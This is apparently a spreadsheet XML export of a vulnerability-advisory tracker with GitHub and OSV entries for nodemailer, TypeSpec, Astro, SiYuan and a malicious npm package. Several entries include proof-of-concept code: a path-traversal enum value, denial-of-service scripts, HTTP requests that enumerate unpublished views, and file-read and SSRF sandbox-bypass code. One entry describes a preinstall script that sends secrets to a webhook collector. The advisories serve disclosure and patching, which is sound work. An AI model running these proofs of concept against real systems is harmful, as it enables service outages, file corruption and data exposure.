
### Patches
The issue has been resolved by creating a static snapshot of attributes using `Array.from(elem.attributes)` before iteration. Please upgrade to `maplibre-gl` version **6.4.1** (or latest).

### Workarounds
Sanitizing the attribute field of a source before passing it down to maplibre</t></is></c><c r="S138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="139"><c r="A139" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B139" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C139" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D139" s="5" t="inlineStr" /><c r="E139" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F139" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G139" s="5" t="inlineStr" /><c r="H139" s="5" t="inlineStr" /><c r="I139" s="5" t="inlineStr" /><c r="J139" s="5" t="inlineStr" /><c r="K139" s="5" t="inlineStr" /><c r="L139" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M139" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N139" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O139" s="5" t="inlineStr" /><c r="P139" s="5" t="inlineStr" /><c r="Q139" s="5" t="inlineStr"><is><t>CWE-125, CWE-787</t></is></c><c r="R139" s="5" t="inlineStr"><is><t>A vulnerability in `libheif`, used by the default Sharp image service in Astro, can lead to remote code execution when a malicious AVIF image is optimized.

Projects are affected when an attacker can cause Astro to process an untrusted AVIF image.

The fix was released in Astro 7.2.8, which requires Sharp 0.35.4.</t></is></c><c r="S139" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="140"><c r="A140" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B140" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C140" s="5" t="inlineStr"><is><t>GHSA-2q33-cf8w-7q23</t></is></c><c r="D140" s="5" t="inlineStr" /><c r="E140" s="5" t="inlineStr" /><c r="F140" s="5" t="inlineStr" /><c r="G140" s="5" t="inlineStr" /><c r="H140" s="5" t="inlineStr" /><c r="I140" s="5" t="inlineStr" /><c r="J140" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K140" s="5" t="inlineStr" /><c r="L140" s="5" t="inlineStr"><is><t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL</t></is></c><c r="M140" s="5" t="inlineStr" /><c r="N140" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O140" s="5" t="inlineStr" /><c r="P140" s="5" t="inlineStr" /><c r="Q140" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R140" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-92f5-vc22-8j33. This link is maintained to preserve external references.

## Original Description

Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S140" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2q33-cf8w-7q23</t></is></c></row><row r="141"><c r="A141" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B141" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C141" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D141" s="5" t="inlineStr" /><c r="E141" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F141" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G141" s="5" t="inlineStr" /><c r="H141" s="5" t="inlineStr" /><c r="I141" s="5" t="inlineStr" /><c r="J141" s="5" t="inlineStr" /><c r="K141" s="5" t="inlineStr" /><c r="L141" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M141" s="5" t="inlineStr" /><c r="N141" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O141" s="5" t="inlineStr" /><c r="P141" s="5" t="inlineStr" /><c r="Q141" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R141" s="5" t="inlineStr"><is><t>### Summary

The `@typespec/openapi3` emitter retains the value of a `@versioned` enum member and interpolates it into the output filename as `{version}` without sanitizing path separators or traversal components. The completed path reaches the compiler's `emitFile()`, which creates the parent directory and writes the file without verifying containment under `emitterOutputDir`.

A crafted declarative `.tsp` input can therefore create or overwrite an OpenAPI-formatted `.yaml` or `.json` file outside the configured output tree, subject to the compiler process's filesystem permissions. No executable TypeSpec extension or attacker-controlled JavaScript is required.

### Affected version

Confirmed on:

- `@typespec/compiler` `1.15.0`
- `@typespec/openapi3` `1.15.0`
- `@typespec/http` `1.15.0`
- `@typespec/versioning` `0.85.0`
- release tag commit `f30cd352f93997e04c75d48c7ace6947a1d5d07a`

The critical `openapi.ts` and `emitter-utils.ts` blobs are unchanged on main commit `365ec52b50b82cd9e1e037de4c6fcd5de7e32e90` as checked on 2026-08-19. No patched version was identified.

### Root cause

The value originates at `packages/openapi3/src/openapi.ts:592-608`:

```ts
serviceRecord.versions.push({
  service,
  version: snapshot.version!.value,
  document: document[0],
  diagnostics: document[1],
});
```

It is interpolated without path validation at `openapi.ts:629-641`:

```ts
return interpolatePath(options.outputFile, {
  "openapi-version": specVersion,
  "service-name-if-multiple": multipleService ? getNamespaceFullName(service.type) : undefined,
  "service-name": getNamespaceFullName(service.type),
  "file-type": fileType,
  version,
});
```

The path reaches `emitFile()` at `openapi.ts:392-401`. The sink at `packages/compiler/src/core/emitter-utils.ts:29-39` performs no output-root containment check:

```ts
const outputFolder = getDirectoryPath(options.path);
await program.host.mkdirp(outputFolder);
return await program.host.writeFile(options.path, content);
```

`resolvePath()` joins the template to `emitterOutputDir` before `{version}` is interpolated, so it does not see the attacker-controlled `..` components.

### Proof of concept

The relevant input in `poc/main.tsp` is:

```tsp
@versioned(Versions) namespace Svc;
enum Versions { v1: "../../../../../../../../../../tmp/TYPESPEC_PWNED/pwn" }
```

Run from PowerShell:

```powershell
cd poc
.\run-revalidation.ps1
```

The supplied Docker runner uses a digest-pinned Node base, a committed npm integrity lock, disabled runtime networking, a benign control, a 90-second timeout, and cleanup enforcement.

Observed in the preserved identity-locked replay (`1/1` attack and `1/1` negative control):

```text
negative_before=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
negative_after=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
attack_before=7a8067bc04e42a025de90fd7aff9be4df59f005d192f2116eecfb107d7bffd78
attack_after=2992b399c1573c9bd2130794f8554c4026bf425861f74e78b5d89ae0324b5e38
outside_file_head=openapi: 3.0.0
inside_attack_files=
```

The benign version preserved the outside canary. The crafted version replaced it with emitted OpenAPI content, and no attack output file remained under `tsp-output`.

### Impact and constraints

Proven impact is out-of-directory YAML/JSON creation or overwrite. The attacker can influence the traversal, final basename, and many strings in the OpenAPI-structured content. The extension is constrained to the selected emitter format, content is not arbitrary bytes, and the target must be writable.

This report demonstrates file corruption. Denial of service is a potential impact when a writable critical file is targeted. It does not claim file disclosure, arbitrary-byte write, deployment takeover, or code execution by a downstream consumer.

### Suggested remediation

After every filename token has been interpolated, resolve the completed destination against `emitterOutputDir` and reject any non-descendant using path-component-aware comparison. Reject or slugify absolute paths, path separators, and traversal components in spec-derived filename tokens. Add regression cases for POSIX and Windows separators, absolute values, sibling-prefix paths, and benign semantic versions.</t></is></c><c r="S141" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="142"><c r="A142" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B142" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C142" s="5" t="inlineStr"><is><t>GHSA-2x7j-588g-ccc2</t></is></c><c r="D142" s="5" t="inlineStr" /><c r="E142" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F142" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G142" s="5" t="inlineStr" /><c r="H142" s="5" t="inlineStr" /><c r="I142" s="5" t="inlineStr" /><c r="J142" s="5" t="inlineStr" /><c r="K142" s="5" t="inlineStr" /><c r="L142" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M142" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N142" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O142" s="5" t="inlineStr" /><c r="P142" s="5" t="inlineStr" /><c r="Q142" s="5" t="inlineStr"><is><t>CWE-400, CWE-407</t></is></c><c r="R142" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's address parser (`lib/addressparser/index.js`) parses a list of comma‑separated addresses in **quadratic time — O(n²)** in the number of addresses. A single crafted address string (e.g. a `To`, `Cc`, `Bcc`, `From`, or `Reply‑To` value, or any value passed to the exported `addressparser`) therefore consumes CPU proportional to the **square** of its length and blocks Node's single‑threaded event loop for the entire duration, denying service to every other request in the process.

This requires **no special application configuration and no cooperating receiver** — it is entirely inside the parser and triggers on the library's default code path. A ~1.5 MB address value freezes the process for ~25–30 seconds of 100% CPU; the cost grows with the square of the input, so a few‑MB value stalls the server for minutes. It is a distinct issue from the recursion DoS fixed as CVE‑2025‑14874 (that path is guarded by a nesting‑depth cap; this one is a flat, comma‑separated list with no such limit).

### Details

`addressparser` tokenizes the input, splits it into per‑address token groups, and then accumulates the parsed results in a loop (`lib/addressparser/index.js`, ~lines 500–505):

```js
addresses.forEach(addr =&gt; {
    const handled = _handleAddress(addr, depth);
    if (handled.length) {
        parsedAddresses = parsedAddresses.concat(handled);   // &lt;-- line ~503
    }
});
```

`Array.prototype.concat` builds and returns a **new** array containing a copy of every element accumulated so far. Reassigning `parsedAddresses = parsedAddresses.concat(handled)` on each of the *n* iterations copies 1 + 2 + 3 + … + n elements in total, i.e. **O(n²)** work (and O(n²) transient allocations) for an input containing *n* addresses. Tokenization and `_handleAddress` themselves are linear; the quadratic blowup is entirely this accumulator.

**Root‑cause proof.** Replacing only that line with an in‑place append and re‑running the exact same input:

```
parsedAddresses = parsedAddresses.concat(handled);      -&gt;  100000 addresses:  ~6068 ms
parsedAddresses.push.apply(parsedAddresses, handled);   -&gt;  100000 addresses:  ~51 ms   (≈119x faster, now linear)
```

**Measured scaling** (nodemailer 9.0.6, `'a@b.com,'.repeat(n)`):

| addresses n | input size | parse time | ratio for 2× input |
|---|---|---|---|
| 25,000  | 0.19 MB | ~0.35 s | – |
| 50,000  | 0.38 MB | ~1.4 s  | ×4.0 |
| 100,000 | 0.76 MB | ~6–8 s  | ×3.9 |
| 200,000 | 1.53 MB | ~25–30 s| ×4.1 |

Doubling the input quadruples the time — the signature of O(n²).

**Reachability.** The parser is invoked on any structured‑address header value on the normal send path (`MimeNode.setHeader('To'/'Cc'/'Bcc'/'From'/'Reply-To', value)` → `_parseAddresses` → `addressparser`, and `getEnvelope()`), so a single `transport.sendMail({ to: &lt;crafted string&gt; })` triggers it. It is also reached directly through the **exported** `require('nodemailer/lib/addressparser')`, which many applications call to validate or display user‑supplied recipient lists. Confirmed via the public API: `setHeader('To', 'a@b.com,'.repeat(80000))` + `getEnvelope()` blocks for ~3.9 s.

**Suggested fix:** accumulate in place instead of rebuilding the array each iteration, e.g. `parsedAddresses.push.apply(parsedAddresses, handled);` (or `for (const h of handled) parsedAddresses.push(h);`). Optionally cap the number of addresses / input length before parsing.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No transport, network, or configuration required — the cost is in parsing.

`poc-dos.js`:
```js
'use strict';
const addressparser = require('nodemailer/lib/addressparser');

console.log('addresses | input size | parse time');
for (const n of [25000, 50000, 100000, 200000]) {
  const payload = 'a@b.com,'.repeat(n);        // n valid, comma-separated recipients
  const t0 = process.hrtime.bigint();
  addressparser(payload);                       // blocks synchronously
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(String(n).padStart(9) + ' | ' + (payload.length / 1048576).toFixed(2) + ' MB   | ' + ms.toFixed(0).padStart(7) + ' ms');
}
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-dos.js
```

Actual output (nodemailer 9.0.6):
```
addresses | input size | parse time
    25000 | 0.19 MB   |     381 ms
    50000 | 0.38 MB   |    1435 ms
   100000 | 0.76 MB   |    7949 ms
   200000 | 1.53 MB   |   25154 ms
```

Equivalent trigger through the normal send API (freezes the event loop):
```js
const nodemailer = require('nodemailer');
nodemailer.createTransport({ jsonTransport: true })
  .sendMail({ from: 'a@b.com', to: 'a@b.com,'.repeat(150000), subject: 'x', text: 'y' });
// ~15+ seconds of 100% CPU inside addressparser before anything is sent
```

### Impact

* **Who is impacted:** any service that runs Nodemailer (or the standalone `nodemailer/lib/addressparser`) on an address value that can be influenced by an untrusted party — a recipient field in a "send email / invite / share" feature, a `Reply‑To`/`From` derived from user input, a contact‑import or mailing‑list parser, or any endpoint that validates addresses with `addressparser`. No authentication, special option, or particular receiver is needed.

## Patched in 9.1.0

Three separate quadratic paths were fixed, not one:

* `addressparser` rebuilt its accumulator with `concat()` on every address ([9116da9](https://github.com/nodemailer/nodemailer/commit/9116da9)).
* The display-name merge loop directly below spliced each fragment out of the array, the same shape reached through `'a, b &lt;c@d.com&gt;,'.repeat(n)` (same commit).
* `MimeNode#_convertAddresses` checked recipient uniqueness with a linear scan per address ([7cc38af](https://github.com/nodemailer/nodemailer/commit/7cc38af), refined in [34da642](https://github.com/nodemailer/nodemailer/commit/34da642)). This was the most severe of the three and the reported proof of concept did not reach it: `'a@b.com,'.repeat(n)` is one address repeated, which dedupes to a single envelope entry. A list of *distinct* recipients cost O(n^2) here, taking ~35s for 100k even after `addressparser` was fixed.

Fixed alongside: `[].concat.apply` in `_parseAddresses` threw `RangeError: Maximum call stack size exceeded` past roughly 124k recipients, with no crafted input needed ([83b8c48](https://github.com/nodemailer/nodemailer/commit/83b8c48)).

Parsing 200k addresses now takes ~80ms instead of ~25s, and every path scales linearly. A new `maxRecipients` option (default 100000) throws rather than truncating, as a backstop.</t></is></c><c r="S142" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2x7j-588g-ccc2</t></is></c></row><row r="143"><c r="A143" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C143" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D143" s="5" t="inlineStr" /><c r="E143" s="5" t="inlineStr" /><c r="F143" s="5" t="inlineStr" /><c r="G143" s="5" t="inlineStr" /><c r="H143" s="5" t="inlineStr" /><c r="I143" s="5" t="inlineStr" /><c r="J143" s="5" t="inlineStr" /><c r="K143" s="5" t="inlineStr" /><c r="L143" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M143" s="5" t="inlineStr" /><c r="N143" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P143" s="5" t="inlineStr" /><c r="Q143" s="5" t="inlineStr" /><c r="R143" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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143" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="144"><c r="A144" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C144" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D144" s="5" t="inlineStr" /><c r="E144" s="5" t="inlineStr" /><c r="F144" s="5" t="inlineStr" /><c r="G144" s="5" t="inlineStr" /><c r="H144" s="5" t="inlineStr" /><c r="I144" s="5" t="inlineStr" /><c r="J144" s="5" t="inlineStr" /><c r="K144" s="5" t="inlineStr" /><c r="L144" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M144" s="5" t="inlineStr" /><c r="N144" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P144" s="5" t="inlineStr" /><c r="Q144" s="5" t="inlineStr" /><c r="R144" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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144" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="145"><c r="A145" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B145" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C145" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D145" s="5" t="inlineStr" /><c r="E145" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F145" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G145" s="5" t="inlineStr" /><c r="H145" s="5" t="inlineStr" /><c r="I145" s="5" t="inlineStr" /><c r="J145" s="5" t="inlineStr" /><c r="K145" s="5" t="inlineStr" /><c r="L145" s="5" t="inlineStr"><is><t>nuget:Microsoft.DiaSymReader.Native</t></is></c><c r="M145" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N145" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O145" s="5" t="inlineStr" /><c r="P145" s="5" t="inlineStr" /><c r="Q145" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R145" s="5" t="inlineStr"><is><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is></c><c r="S145" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="146"><c r="A146" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B146" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C146" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D146" s="5" t="inlineStr" /><c r="E146" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F146" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G146" s="5" t="inlineStr" /><c r="H146" s="5" t="inlineStr" /><c r="I146" s="5" t="inlineStr" /><c r="J146" s="5" t="inlineStr" /><c r="K146" s="5" t="inlineStr" /><c r="L146" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M146" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N146" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O146" s="5" t="inlineStr" /><c r="P146" s="5" t="inlineStr" /><c r="Q146" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R146" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="S146" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="147"><c r="A147" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B147" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C147" s="5" t="inlineStr"><is><t>GHSA-8m3c-c648-2xjj</t></is></c><c r="D147" s="5" t="inlineStr" /><c r="E147" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F147" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G147" s="5" t="inlineStr" /><c r="H147" s="5" t="inlineStr" /><c r="I147" s="5" t="inlineStr" /><c r="J147" s="5" t="inlineStr" /><c r="K147" s="5" t="inlineStr" /><c r="L147" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M147" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N147" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O147" s="5" t="inlineStr" /><c r="P147" s="5" t="inlineStr" /><c r="Q147" s="5" t="inlineStr"><is><t>CWE-73, CWE-918</t></is></c><c r="R147" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

